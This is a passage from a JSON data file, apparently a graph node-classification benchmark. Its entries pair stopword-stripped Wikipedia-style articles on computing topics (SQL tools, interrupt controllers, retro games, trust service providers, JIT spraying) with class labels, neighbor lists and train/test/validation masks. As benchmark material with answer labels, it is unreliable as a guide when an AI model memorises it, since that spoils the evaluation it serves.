    "text": "SQL_programming_tool:sql programming tool field software sql programming tools provide platforms database administrators dbas application developers perform daily tasks efficiently accurately database administrators application developers often face constantly changing environments rarely completely control many changes result new development projects modifications existing code deployed production always produce expected result organizations better manage development projects teams develop code suppliers sql programming tools normally provide facility database administrator application developer aid database management quality code-deployment practices sql programming tools may include following features sql editors allow users edit execute sql statements may support following features tools may display information database objects relevant developers database administrators users may tools also provide features display dependencies among objects allow users expand dependent objects recursively example packages may reference views views generally reference tables super/subtypes database administrators application developers use session browsing tools view current activities user database check resource-usage individual users statistics information locked objects current running sql individual session dbas create edit delete disable enable user-accounts database using security-management tools dbas also assign roles system privileges object privileges storage-quotas users tools offer features debugging stored procedures step step step run exception breakpoints view set variables view call stack users debug program-unit without making modification including triggers object types monitoring tools may show database resources — usage summary service time summary recent activities top sessions session history top sql — easy-to-read graphs database administrators easily monitor health various components monitoring instance application developers may also make use tools diagnose correct application-performance problems well improve sql server performance test data generation tools populate database realistic test data server client side testing purposes also kind software upload sample blob files database",
    "neighbors": [
      2780,
      10413,
      10737,
      2068,
      9112,
      9177,
      5403,
      7804
    ],
    "mask": "Test"
  },
  {
    "node_id": 3255,
    "label": 3,
    "text": "OpenPIC_and_MPIC:openpic mpic order compete intel advanced programmable interrupt controller apic enabled first intel 486-based multiprocessor systems early 1995 amd cyrix proposed somewhat similar-in-purpose openpic architecture supporting 32 processors openpic architecture least declarative support ibm compaq around 1995 x86 motherboard released openpic however openpic failure x86 market amd licensed intel apic architecture amd athlon later processors ibm however developed multiprocessor interrupt controller mpic based openpic register specification reference ibm design processors share mpic dcr bus access bus controlled dcr arbiter mpic supports four processors 128 interrupt sources various implementations mpic included powerpc reference designs retail computers ibm used mpic based openpic 1.0 rs/6000 f50 one based openpic 1.2 rs/6000 s70 systems also used dual 8259 pci-isa bridges ibm mpic also used rs/6000 7046 model b50 apple hydra mac i/o mio chip 1990s classic mac os era implemented mpic alongside scsi controller adb controller geoport controller timers apple implementation open pic apple documentation era spells first mio chip common hardware reference platform based version 1.2 register specification supported two processors 20 interrupt sources mpic also incorporated newer k2 i/o controller used power mac g5s freescale also uses mpic compatible open pic powerquicc qoriq processors linux kernel-based virtual machine kvm supports virtualized mpic 256 interrupts based freescale variants",
    "neighbors": [
      576,
      1058,
      8439,
      7065,
      8058,
      3323,
      8700,
      3294
    ],
    "mask": "Test"
  },
  {
    "node_id": 3256,
    "label": 3,
    "text": "Ikari_Warriors:ikari warriors ikari warriors vertically scrolling run gun shoot 'em arcade game developed snk published north america europe tradewest released 1986 originally titled japan ikari warriors snk first major breakthrough us release game released time many commando clones market distinguished ikari warriors rotary joysticks two-player mode player characters ikari warriors colonel ralf second lieutenant clark later king fighters series known outside japan paul vince ikari series battling hordes enemies according designer keiko iju game inspired popular rambo films takes name japanese title rambo ikari dasshutsu furious escape ralf clark also make appearance playable characters metal slug 6 metal slug 7 well king fighters series stan szczepanski holds official guinness world record 1,799,000 points player takes role commando-like warriors named ralf red clark blue must try reach village ikari enemy units attempting kill player include tanks enemy soldiers helicopters number power-ups along way help player achieve victory players must proceed bottom screen upwards towards village ikari trying prevent reaching village enemy soldiers units along way players may commandeer enemy tanks helicopters nes version help fight way enemy personnel tanks immune enemy bullets limited supply fuel sustain damage runs tank caught explosion taking player unless exit tank get clear blows helicopters two different weapons spread gun cannon may fly water rotating joystick changes direction character faced independent direction character moving controlled pushing joystick gives player freedom attack walk eight different directions shot fired directly front player warrior uses machine gun right hand throws grenades left player character takes long moving screen computer starts using call fire red spot appears tracking fire speed game ikari warriors first popular video game used rotary joysticks rotated addition pushed eight directions less successful tnk iii released 1985 also snk first used joysticks system also features two buttons one standard gun another lobbing grenades one games time allow two-player cooperative side-by-side gameplay use vehicles game cabinet standard upright model ikari warriors printed circuit boards pcbs manufactured two different versions snk pinout jamma pinout snk-pinout units put ikari warriors cabinets jamma-pinout units supplied conversion kits snk-pinout boards 22/44-pin edge connectors jamma-pinout pcbs 28/56-pin edge connectors types consist stack three boards interconnects ikari warriors uses snk model ls-30 joysticks contain 12-way rotary switch box joysticks connected pcb via auxiliary wiring harnesses game known simply ikari japan ikari warriors united states europe addition changing names main characters ralf clark paul vince military commander player rescues end game named general kawasaki japanese version named snk founder eikichi kawasaki colonel cook us/euro version named tradewest founder leland cook general kawasaki name unchanged nes version enemies game actually neo-nazis evidenced presence swastika middle final room ikari warriors ported nintendo entertainment system ibm pc apple ii atari st atari 2600 atari 7800 amiga commodore 64 zx spectrum amstrad cpc msx port conversions 16-bit machines released 1987 pc commodore 64 ports developed quicksilver software 1989 second c64 version released uk elite software nes version developed micronics atari 2600 atari 7800 ports released 1990 one final published games systems game also included snk 40th anniversary collection nintendo switch playstation 4 1996 next generation listed arcade version ikari warriors number 61 top 100 games time lauding innovative joysticks play balance power-ups offer invigorating boost player character capabilities without taking away game challenge computer video games enthusiastically reviewed classy amstrad personal computer conversion calling graphics simply brilliant gameplay awesomely addictive said players wo n't see better ... probably quite amstrad graphics close dammit arcade machine playability goes c+vg scale pc version game received 4 5 stars dragon ikari warriors spawned sequels victory road 1986 1989 snk released ikari warriors clone 1987 called guerrilla war known guevara japan game features communist fighters che guevara fidel castro heroes",
    "neighbors": [
      11238,
      7916,
      9006,
      1776,
      11477,
      1624,
      4540,
      3256
    ],
    "mask": "None"
  },
  {
    "node_id": 3257,
    "label": 6,
    "text": "Free_space_bitmap:free space bitmap free-space bitmaps one method used track allocated sectors file systems simplistic design highly inefficient advanced hybrid implementations free space bitmaps used modern file systems simplest form free space bitmap bit array i.e block bits example zero would indicate free sector one indicates sector use sector would fixed size explanatory purposes use 4 gib hard drive 4096 byte sectors assume bitmap stored elsewhere example disk would require 1,048,576 bits one sector 128 kib increasing size drive proportionately increase size bitmap multiplying sector size produce proportionate reduction operating system os needs write file scan bitmap finds enough free locations fit file 12 kib file stored example drive three zero bits would found changed ones data would written across three sectors represented bits file subsequently truncated 8 kib final sector bit would set back zero indicating available use drive size grows amount time needed scan free space become unreasonable address real world implementations free space bitmaps find ways centralize information free space one approach split bitmap many chunks separate array stores number free sectors chunk chunks insufficient space easily skipped total amount free space easier compute finding free space entails searching summary array first searching associated bitmap chunk exact sectors available approach drastically reduces cost finding free space n't help process freeing space combined size summary array bitmap greater readily stored memory large number files scattered sectors freed enormous amount disk access necessary find sectors decrement summary counter flip bits back zero greatly reduces benefits bitmap longer performing function summarizing free space rapidly without reading disk",
    "neighbors": [
      7969,
      9762,
      8772,
      2383,
      7983,
      2194,
      3315,
      8114,
      3640,
      3834,
      2687
    ],
    "mask": "Test"
  },
  {
    "node_id": 3258,
    "label": 3,
    "text": "Super_Cars:super cars super cars top-view racing game gremlin interactive later produced lotus series games stylistically game influenced super sprint 9 tracks 4 difficulty levels raced order although last track race made harder usual races win money spent temporary handling power upgrades plus armour plating front/rear shooting missiles knock racers player must finish top 3 race progress initially 4 computer opponents added progress game car upgraded throughout game via shop section player given initial price also number options things say salesman right combination price drop followed super cars ii 1991 three cars available purchase game taraco neoroder turbo vaug interceptor turbo retron parsec turbo appears based real car time retron parsec turbo based cizeta-moroder v16t vaug interceptor based honda nsx taraco neoroder based alfa romeo sz sprint zagato slight changes slight contrast box art blue starter car taraco instead closely resembles contemporary european ford fiesta escort cosworth convertible retron also portrayed differently box art lamborghini countach instead cizeta",
    "neighbors": [
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 3259,
    "label": 4,
    "text": "Hillar_Aarelaid:hillar aarelaid hillar aarelaid born december 31 1967 founder first ceo estonia computer emergency response team cert-ee director general estonian data protection inspectorate 1999 2003 aarelaid one central officials charge responding computer attacks estonia bronze soldier tallinn controversy american expert bill woodcock observers praised aarelaid calm professionalism displayed attacks",
    "neighbors": [
      3207
    ],
    "mask": "Train"
  },
  {
    "node_id": 3260,
    "label": 8,
    "text": "WebMacro:webmacro webmacro framework developing java servlets enforces model-view-controller framework project allowing clean separation concerns design particular webmacro keeps program source code absolutely separate presentation html code webmacro open source software webmacro initially created designed justin wells semiotek inc. mid-2000 project taken team sourceforge extensive discussions webmacro java servlet-interest mailing list time may influential sun microsystems decision move java server pages product model-view-controller architecture webmacro also used generate arbitrary text output templates one uses automated code generation template language similar language used apache velocity automated script perform migration apache velocity project started clean room re-implementation jon scott stevens geir magnusson jason van zyl agreement could reached adoption apache license current version webmacro bsd licensed",
    "neighbors": [
      9665,
      8860
    ],
    "mask": "Test"
  },
  {
    "node_id": 3261,
    "label": 9,
    "text": "William_A._Martin:william a. martin william arthur martin 1938-1981 computer scientist oklahoma city oklahoma graduating northwest classen high school state wrestling champion attended mit received bachelor degree 1960 master 1962 ph.d. 1967 electrical engineering supervision marvin minsky dissertation symbolic mathematical laboratory obtaining degrees worked teaching assistant mit beginning 1960 became assistant professor 1968 promoted associate professor electrical engineering 1972 1975 received academic tenure held joint appointment mit sloan school management research pulled towards project mac became laboratory computer science artificial intelligence laboratory researched expert systems finishing ph.d. dissertation symbolic mathematics martin co-founded macsyma project 1968 directed 1971 macsyma later became successful commercial product also core free maxima system martin worked automatic programming knowledge representation natural language processing",
    "neighbors": [
      7048,
      7780
    ],
    "mask": "Test"
  },
  {
    "node_id": 3262,
    "label": 4,
    "text": "Data-centric_security:data-centric security data-centric security approach security emphasizes security data rather security networks servers applications data-centric security evolving rapidly enterprises increasingly rely digital information run business big data projects become mainstream data-centric security also allows organizations overcome disconnect security technology objectives business strategy relating security services directly data implicitly protect relationship often obscured presentation security end common processes data-centric security model include technical point view information data -centric security relies implementation following data access control selective restriction access data accessing may mean viewing editing using defining proper access controls requires map information resides important important sensitive data designing appropriate controls encryption proven data-centric technique address risk data theft smartphones laptops desktops even servers including cloud one limitation encryption always effective network intrusion occurred cybercriminals operate stolen valid user credentials data masking process hiding specific data within database table cell ensure data security maintained sensitive information exposed unauthorized personnel may include masking data users developers third-party outsourcing vendors etc data masking achieved multiple ways duplicating data eliminate subset data needs hidden obscuring data dynamically users perform requests monitoring activity data layer key component data-centric security strategy provides visibility types actions users tools requested authorized specific data elements continuous monitoring data layer combined precise access control contribute significantly real-time detection data breaches limits damages inflicted breach even stop intrusion proper controls place 2016 survey shows organizations still n't assess database activity continuously lack capability identify database breaches timely fashion cloud computing evolving paradigm tremendous momentum unique aspects exacerbate security privacy challenges heterogeneity diversity cloud services environments demand fine-grained access control policies services flexible enough capture dynamic context attribute-based access requirements data protection recent decades many organizations rely managing database services public clouds amazon web services oracle cloud google cloud platform microsoft azure organize data approach limitations users managing security sensitive data instance hardware security appliances agents running database servers longer option requires innovative ways secure data databases using reverse proxy sitting clients applications database servers requirements supporting load balancing high availability fail-over data-centric security brings additional challenges database security vendors must meet",
    "neighbors": [
      899,
      5636,
      10756,
      9607,
      4236,
      5389,
      9356,
      1935,
      9488,
      3473,
      8978,
      10392,
      5373,
      5246,
      4892,
      5404,
      2975,
      2084,
      2213,
      8998,
      3880,
      939,
      2733,
      3629,
      3887,
      7855,
      2737,
      1970,
      9646,
      5433,
      7739,
      9791,
      3525,
      5573,
      7368,
      9160,
      5325,
      7248,
      2262,
      6360,
      9688,
      7515,
      4956,
      4194,
      3941,
      6373,
      107,
      11244,
      10232,
      2041,
      10492,
      5245,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3263,
    "label": 9,
    "text": "Parametricity:parametricity programming language theory parametricity abstract uniformity property enjoyed parametrically polymorphic functions captures intuition instances polymorphic function act way consider example based set x type x x → x functions x higher-order function twice x → x given twice f f ∘ f intuitively independent set x family functions twice parametrized sets x called parametrically polymorphic function simply write twice entire family functions write type formula_1 x x → x individual functions twice called components instances polymorphic function notice component functions twice act way given rule families functions obtained picking one arbitrary function x → x would uniformity called ad hoc polymorphic functions parametricity abstract property enjoyed uniformly acting families twice distinguishes ad hoc families adequate formalization parametricity possible prove parametrically polymorphic functions type formula_1 x x → x one-to-one natural numbers function corresponding natural number n given rule f formula_3 f i.e. polymorphic church numeral n contrast collection ad hoc families would large set parametricity theorem originally stated john c. reynolds called abstraction theorem paper theorems free philip wadler described application parametricity derive theorems parametrically polymorphic functions based types parametricity basis many program transformations implemented compilers haskell programming language transformations traditionally thought correct haskell haskell non-strict semantics despite lazy programming language haskell support certain primitive operations—such operator codice_1—that enable so-called selective strictness allowing programmer force evaluation certain expressions paper free theorems presence seq patricia johann janis voigtlaender showed presence operations general parametricity theorem hold haskell programs thus transformations unsound general",
    "neighbors": [
      8738,
      10246,
      4392,
      6536,
      10729,
      5585,
      8722,
      4980,
      11574
    ],
    "mask": "Test"
  },
  {
    "node_id": 3264,
    "label": 4,
    "text": "Trust_service_provider:trust service provider trust service provider tsp person legal entity providing preserving digital certificates create validate electronic signatures authenticate signatories well websites general trust service providers qualified certificate authorities required european union switzerland context regulated electronic signing procedures term trust service provider coined european parliament european council important relevant authority providing non-repudiation regulated electronic signing procedure first brought electronic signatures directive 1999/93/ec initially named certification-service provider directive repealed eidas regulation became official july 1 2016. ref name= 1999/93/ec /ref regulation binding legislative act requires eu member states follow trust service provider responsibility assure integrity electronic identification signatories services strong mechanisms authentication electronic signatures digital certificates eidas defines standards trust service providers perform services authentication non-repudiation regulation provides guidance eu member states trust service providers shall regulated recognized trust service defined electronic service entails one three possible actions first may concern creation verification validation electronic signatures well time stamps seals electronically registered delivery services certifications required services second action entails creation verification well validation certificates used authenticate websites third action preservation electronic signatures seals related certificates elevated level qualified trust service service must meet requirements set eidas regulation trust services provide trust framework facilitates continued relations electronic transactions conducted participating eu member states organizations qualified trust service provider plays important role process qualified electronic signing trust service providers must given qualified status permission supervisory government body provide qualified digital certificates used create qualified electronic signatures eidas requires eu maintain eu trust list lists providers services received qualified status trust service provider entitled provide qualified trust services eu trust list trust service providers eu trust list required follow strict guidelines established eidas need provide stamps valid time date creating certificates signatures expired certificates need revoked immediately eu obliges trust service providers deliver appropriate training personnel employed trust service provider shall provide tools software hardware trustworthy capable preventing forgeries certificates produced one major intents eidas facilitate public business services especially conducted parties across eu member state borders transactions safely expedited means electronic signing services provided trust service providers regards ensuring integrity signatures eu member states required eidas establish “ points single contact ” pscs trust services ensure electronic id schemes used cross-board public sector transactions including exchange access healthcare information across borders advanced electronic signature legally binding eidas qualified electronic signature created qualified trust service provider carries higher probative value used evidence court signature ’ authorship considered non-repudiable authenticity signature easily challenged eu member states obligated accept qualified electronic signatures created qualified certificate member states valid according eidas regulation i.e article 24 2 signature created qualified certificate legal value handwritten signature court standards evolving additional standards including policy definitions trust service providers development european telecommunication standards institute etsi swiss digital signing standard zertes defined comparable concept certificate service providers certificate service providers need audited conformity assessment bodies appointed schweizerische akkreditierungsstelle united states nist digital signature standard dss current release know anything comparable qualified trust service provider would allow enhance non-repudiation signatory qualified certificate however authors forthcoming review commentators publicly discussing amendment similar eidas zertes approach trusted service provision allow stringent non-repudiable global transactions legal relevance international harmonization would required several research institutes associations expressed concern respect establishment small group centralized trust service providers per country authenticate digital transactions state construct may negative impact privacy given central role trust service providers many transactions council european professional informatics societies cepis fears trust service providers would gain collect information distinguishing attributes citizens subject authentication regard requirement preserve data resulting expected efforts keep evidence potential liability requests inaccurate id cepis sees risk trust service providers could create store log entries authentication processes information gained allows monitoring profiling involved citizens transaction counterpart also identifies user interests communication behaviour additionally sharpen profiles gained big data analysis would allow far-reaching insights citizens privacy relationships direct connection qualifying governmental bodies could allow gain access gained data profiles authors claim truly take advantage secure seamless cross-border electronic transactions assurance levels definitions technical deployment need specified precisely",
    "neighbors": [
      7075,
      517,
      5674,
      2286,
      4015,
      5200,
      8018,
      10452,
      1496,
      5433,
      3231
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3265,
    "label": 6,
    "text": "Global_file_system:global file system computer science global file system historically referred distributed virtual name space built set local file systems provide transparent access multiple potentially distributed systems global file systems properties blocking interface buffering etc guaranteed path name corresponds object computers deploying filesystem also called distributed file systems file systems rely redirection distributed systems therefore latency scalability affect file access depending target systems reside andrew file system attempted solve campus environment using caching weak consistency model achieve local access remote files recently global file systems emerged combine cloud object storage versioning local caching create single unified globally accessible file system rely redirection storage device serves files local cache maintaining single file system meta data object storage described google patents advantages global file systems include ability scale object storage use snapshots stored object storage versioning replace backup create centrally managed consolidated storage repository object storage",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      1801,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      2339,
      5413,
      3368,
      9004,
      302,
      6961,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      7126,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3266,
    "label": 3,
    "text": "Moonsound:moonsound moonsound name sound card released msx home-computer system tilburg computer fair 1995 name moonsound originated software moonblaster written people use hardware plug-in synthesizer moonsound sound-card produced msx home-computer system based yamaha ymf278 opl4 sound chip capable 18 channels fm sound well 24 channels 12 16 bit sample-based synthesis arrived us branch microsoft abandoned msx system focusing ibm pc 2 mb instrument rom containing multisampled instruments unusual time factory came equipped one 128 kb sram chip user samples designed electronic engineer henrik gilvad produced sunrise swiss semi-hobby basis two generations made first small size pcb without box later larger size pcb fit msx cartridge available later version room two sample sram chips resulting 1 mb compressed user samples moonblaster software designed remco schrijvers based time-step sequencer software msx sound cards moonblaster came two versions one fm one sample-based synthesis later marcel delorme took software development sound effects like chorus delay reverb omitted due cost size usability reasons yamaha effect chip requires specialised memory effect routing basic 18 fm channels 24 channels sample-based sound shares effect setting creative step-time sequencer programmers made pseudo effects like chorus reverb delay overdubbing using dedicated channels repeat notes delay stereo panning effective quickly reduces musical complexity possible moonsound version 1.0 1 socket user sample ram moonsound version 1.1 1.2 2 sockets 1mb sram hackers found stack 2 additional sram chips resulting 2mb sram based opl4 chip moonsound compatible fm register opl1 opl2 opl3 msx-audio contains chip also compatible opl1 therefore older software make use moonsound 2 mb rom contained 330 mono samples mostly 22.050 khz 12 bits drums 44.1 khz fm part opl4 chip configured several ways four-operator fm allows complex sounds reduces polyphony eight waveforms available fm synthesis moonsound audio power supply isolated digital supply attempt reduce noise separate stereo audio output mixed internal msx sound additional software tools able rip sound loops digitally audio cds inserted cd-rom drive connected scsi ata-ide interfaces software designed henrik gilvad msx club gouda sunrise swiss today moonsound emulated msx emulators bluemsx openmsx",
    "neighbors": [
      2861,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 3267,
    "label": 9,
    "text": "John_Ousterhout:john ousterhout john kenneth ousterhout born october 15 1954 professor computer science stanford university founded electric cloud john graham-cumming ousterhout professor computer science university california berkeley created tcl scripting language tk platform-independent widget toolkit proposed idea coscheduling ousterhout also led research group designed experimental sprite operating system first log-structured file system ousterhout author magic vlsi computer-aided design cad program received bachelor degree physics yale university 1975 ph.d. computer science carnegie mellon university 1980 ousterhout received grace murray hopper award 1987 work cad systems very-large-scale integrated circuits work inducted 1994 fellow association computing machinery ousterhout member national academy engineering 1994 ousterhout left berkeley join sun microsystems laboratories hired team join tcl development several years sun left co-founded scriptics inc. later renamed ajuba solutions january 1998 provide professional tcl development tools tcl team followed sun ajuba purchased interwoven october 2000 joined faculty stanford university 2008",
    "neighbors": [
      5634,
      3725,
      7315,
      10008,
      8987,
      1316,
      692,
      9780,
      3512,
      9019,
      9665,
      3013,
      1613,
      1236,
      9300,
      346,
      11099,
      739,
      11501,
      2798,
      8057
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3268,
    "label": 3,
    "text": "Jack_Nicklaus'_Greatest_18_Holes_of_Major_Championship_Golf:jack nicklaus greatest 18 holes major championship golf jack nicklaus greatest 18 holes major championship golf golf-simulation video game developed sculptured software published accolade beginning 1988 released amiga amstrad cpc apple ii atari st commodore 64 c64 ms-dos macintosh msx nintendo entertainment system nes pc-88 sharp x68000 1990 1991 game released hucard cartridge cd-rom formats u.s turbografx-16 foreign counterpart pc engine turbografx-16 versions game titled jack nicklaus turbo golf pc engine version titled jack nicklaus world golf tour cd-rom format game boy version released jack nicklaus golf 1992 first series golf games named golfer jack nicklaus followed jack nicklaus unlimited golf course design 1990 game features jack nicklaus favorite 18 golf holes put together single course includes holes augusta national golf club muirfield pebble beach golf links royal lytham st annes golf club old course st andrews two courses designed nicklaus also featured game castle pines colorado desert mountain arizona additionally game boy version includes muirfield village course several add-on disks released computer versions add additional courses game features two game modes stroke play skins multiplayer option allows maximum total four players able play player also compete selection eight different cpu players includes jack nicklaus image nicklaus also appears holes gives tips player jack nicklaus turbo golf turbografx-16 differs versions cd-rom format game five courses including castle pines courses previously featured game early add-on disks australian golf club royal troon golf club kemper lakes golf club st. creek golf club cd-rom version allows player take 360-degree look around courses nicklaus appears courses give advice hole hucard cartridge version jack nicklaus turbo golf includes one course australian golf club includes eight golfer rivals well jack nicklaus accolade began publishing jack nicklaus greatest 18 holes major championship golf 1988 longest title software product time release august 1989 versions released united kingdom commodore 64 pc versions amiga amstrad cpc atari st scheduled release autumn apple ii version released late 1989 1990 macintosh version published accolade nes version published konami released united states march 1990 united kingdom release came august 1991 versions also released msx pc-88 sharp x68000 u.s. turbografx-16 game released jack nicklaus turbo golf hucard cd-rom formats game also released turbografx-16 foreign counterpart pc engine cd-rom format pc engine version published title jack nicklaus world golf tour game hucard format retained original jack nicklaus greatest 18 holes major championship golf title jack nicklaus turbo golf foreign counterparts released 1990 1991 game boy version jack nicklaus golf released united states may 1992 published tradewest along unrelated game title super nes computer versions game received criticism slow load times generating new screen criticized computer version including off-disc copy protection scheme deemed difficult use critics favorably compared game leader board golfing game series praise given graphics amiga amstrad cpc commodore 64 versions amstrad action called cpc version beyond shadow doubt best golf sim ever cpc however magazine also wrote game would immediately appeal golf fans people played computer golf games stating limitations unfairly cripple game popularity – crime entertaining well-programmed sports sim cu amiga-64 praised amiga version gameplay critical minimal sounds putting agonisingly slow computer golfer opponent zzap 64 reviewed commodore 64 version criticized sound effects well blocky scenery unusual color schemes games machine reviewing cpc st versions criticized blocky scenery murky colors well simple sound effects poorly animated golfer sprites reviewing amiga version magazine praised digitized image jack nicklaus appears holes criticized rest graphics tom malcom .info reviewed commodore 64 version called graphics adequate sound abominable concluded game overall good choice malcom subsequently reviewed amiga version praised gameplay felt graphics could also wished option turn jack nicklaus advice hole stating slowed gameplay considerably bob wade amiga format praised sound tony hetherington amiga criticized bad putting controls called game perfectly playable competently programmed still considered bland amiga action praised game recommended considered leader board superior amiga user international recommended game people already purchased mean 18 similar golf game also accolade dan muse incider praised apple ii version new standard computer golf games best sports game period regarding image nicklaus appears holes muse wrote okay little corny like michael dashe macworld praised macintosh version graphics realistic gameplay variety courses nes turbografx-16 versions also criticized slow reanimation raze reviewed nes version stated easy gameplay fun play people rather alone mean machines criticized nes version blocky scenery stating hampered gameplay magazine also criticized golfer sprite average sound effects lack music concluded tedious golf sim die-hard fans genre take chance chicago sun-times reviewing one game versions wrote great golfing enthusiasts good new golf chip jonathan carter writing philadelphia daily news reviewed turbografx-16 cartridge version stated additional courses would nice although praised gameplay graphics gamepro reviewed turbografx-16 cd-rom version recommended game golf fans criticized slow reanimation stated game offer much distinguish golf games",
    "neighbors": [
      10931,
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 3269,
    "label": 8,
    "text": "BigQuery:bigquery bigquery restful web service enables interactive analysis massive datasets working conjunction google storage serverless platform service paas may used complementarily mapreduce limited testing period 2010 bigquery generally available november 2011 google atmosphere conference april 2016 european users service suffered 12-hour outage may 2016 support announced google sheets bigquery provides external access dremel technology scalable interactive ad hoc query system analysis read-only nested data bigquery requires requests authenticated supporting number google-proprietary mechanisms well oauth",
    "neighbors": [
      4096,
      3,
      4623,
      3600,
      8719,
      7700,
      9244,
      9766,
      5159,
      10284,
      3121,
      3633,
      4683,
      11343,
      3664,
      7248,
      10836,
      8285,
      6750,
      2658,
      4194,
      5732,
      8821,
      2170,
      7816,
      4236,
      10893,
      5262,
      6800,
      11408,
      10393,
      8858,
      10912,
      7841,
      6307,
      1203,
      7352,
      7359,
      4289,
      196,
      3782,
      1224,
      10445,
      3795,
      1240,
      8413,
      9949,
      6367,
      3819,
      236,
      9970,
      7926,
      3836,
      253,
      1789,
      8446,
      5892,
      8455,
      2328,
      4377,
      8986,
      10009,
      10525,
      798,
      288,
      10020,
      4901,
      6444,
      8495,
      5431,
      2875,
      10045,
      11590,
      8520,
      11592,
      4429,
      9039,
      3409,
      1362,
      10090,
      5483,
      5499,
      7548,
      11646,
      1409,
      4995,
      9610,
      911,
      1935,
      8592,
      5522,
      1427,
      5524,
      2965,
      10645,
      1435,
      2978,
      1959,
      3499,
      7595,
      2496,
      5066,
      4044,
      4048,
      9682,
      467,
      6632,
      5100,
      7660,
      9712
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3270,
    "label": 4,
    "text": "JIT_spraying:jit spraying jit spraying class computer security exploit circumvents protection address space layout randomization aslr data execution prevention dep exploiting behavior just-in-time compilation used exploit pdf format adobe flash just-in-time compiler jit definition produces code data since purpose produce executable data jit compiler one types programs run no-executable-data environment jit compilers normally exempt data execution prevention jit spray attack heap spraying generated code produce exploit code jit idea dion blazakis used input program usually javascript actionscript typically contains numerous constant values erroneously executed code example xor operation could used jit transform bytecode native x86 code like attacker uses suitable bug redirect code execution newly generated code example buffer overflow use free bug could allow attack modify function pointer return address causes cpu execute instructions way unintended jit authors attacker usually even limited expected instruction boundaries possible jump middle intended instruction cpu interpret something else non-jit rop attacks may enough operations usefully take control computer continuing example jumping second byte mov instruction results inc instruction computer hardware allows jumping middle instruction includes x86 x86-64 arm although especially effective type hardware jit spraying works systems well protect jit spraying jit code disabled made less predictable attacker",
    "neighbors": [
      8609,
      1954,
      1474,
      3234,
      3462,
      5356,
      9964,
      1103,
      10097,
      11537,
      499,
      8627,
      5176,
      1820,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3271,
    "label": 4,
    "text": "FIDO2_Project:fido2 project fido2 project joint effort fido alliance world wide web consortium w3c whose goal create strong authentication solution web core fido2 consists w3c web authentication webauthn standard fido client authenticator protocol ctap fido2 based upon previous work done fido alliance particular universal 2nd factor u2f authentication standard taken together webauthn ctap specify standard authentication protocol protocol endpoints consist user-controlled cryptographic authenticator smartphone hardware security key webauthn relying party also called fido2 server web user agent i.e. web browser together webauthn client form intermediary authenticator relying party single webauthn client device may support multiple webauthn clients example laptop may support multiple clients one conforming user agent running laptop conforming user agent implements webauthn javascript api name implies client authenticator protocol ctap enables conforming cryptographic authenticator interoperate webauthn client ctap specification refers two protocol versions called ctap1/u2f ctap2 authenticator implements one protocols typically referred u2f authenticator fido2 authenticator respectively fido2 authenticator also implements ctap1/u2f protocol backward compatible u2f",
    "neighbors": [
      4965,
      10566,
      6316,
      7212,
      5918,
      10801,
      124,
      1054
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3272,
    "label": 3,
    "text": "Interrupt_request_(PC_architecture):interrupt request pc architecture computer interrupt request irq hardware signal sent processor temporarily stops running program allows special program interrupt handler run instead hardware interrupts used handle events receiving data modem network card key presses mouse movements interrupt lines often identified index format irq followed number example intel 8259 family pics eight interrupt inputs commonly referred irq0 irq7 x86 based computer systems use two pics combined set lines referred irq0 irq15 technically lines named ir0 ir7 lines isa bus historically attached named irq0 irq15 newer x86 systems integrate advanced programmable interrupt controller apic conforms intel apic architecture apics support programming interface 255 physical hardware irq lines per apic typical system implementing support around 24 total hardware lines working personal computer hardware installing removing devices system relies interrupt requests default settings configured system bios recognized operating system default settings altered advanced users modern plug play technology reduced need concern settings also virtually eliminated manual configuration typically systems using intel 8259 pic 16 irqs used irqs 0 7 managed one intel 8259 pic irqs 8 15 second intel 8259 pic first pic master one directly signals cpu second pic slave instead signals master irq 2 line master passes signal cpu therefore 15 interrupt request lines available hardware newer systems using intel apic architecture typically 24 irqs available extra 8 irqs used route pci interrupts avoiding conflict dynamically configured pci interrupts statically configured isa interrupts early apic systems 16 irqs intel 8259 interrupt controllers pci interrupt lines routed 16 irqs using pir integrated southbridge easiest way viewing information windows use device manager system information msinfo32.exe linux irq mappings viewed executing cat /proc/interrupts using procinfo utility early ibm-compatible personal computers irq conflict common hardware error received two devices trying use interrupt request irq signal interrupt programmable interrupt controller pic pic expects interrupt requests one device per line thus one device sending irq signals along line generally cause irq conflict freeze computer example modem expansion card added system assigned irq4 traditionally assigned serial port 1 likely cause irq conflict initially irq 7 common choice use sound card later irq 5 used found irq 7 would interfere printer port lpt1 serial ports frequently disabled free irq line another device irq 2/9 traditional interrupt line mpu-401 midi port conflicts acpi system control interrupt sci hardwired irq9 intel chipsets means isa mpu-401 cards hardwired irq 2/9 mpu-401 device drivers hardcoded irq 2/9 used interrupt-driven mode system acpi enabled rare conditions two devices could share irq long used simultaneously solve problem later pci bus specification allows irq sharing additional support message signaled interrupts msi later revisions pci express physical interrupt lines uses msi exclusively",
    "neighbors": [
      780,
      6797,
      7313,
      6806,
      1176,
      1058,
      2476,
      6063,
      8625,
      1461,
      823,
      5823,
      10183,
      3272,
      2379,
      5457,
      11477,
      10969,
      4699,
      3294,
      1121,
      2019,
      5348,
      1515,
      6510,
      6129,
      7281,
      499,
      7538,
      3445,
      5368,
      11130,
      1791
    ],
    "mask": "None"
  },
  {
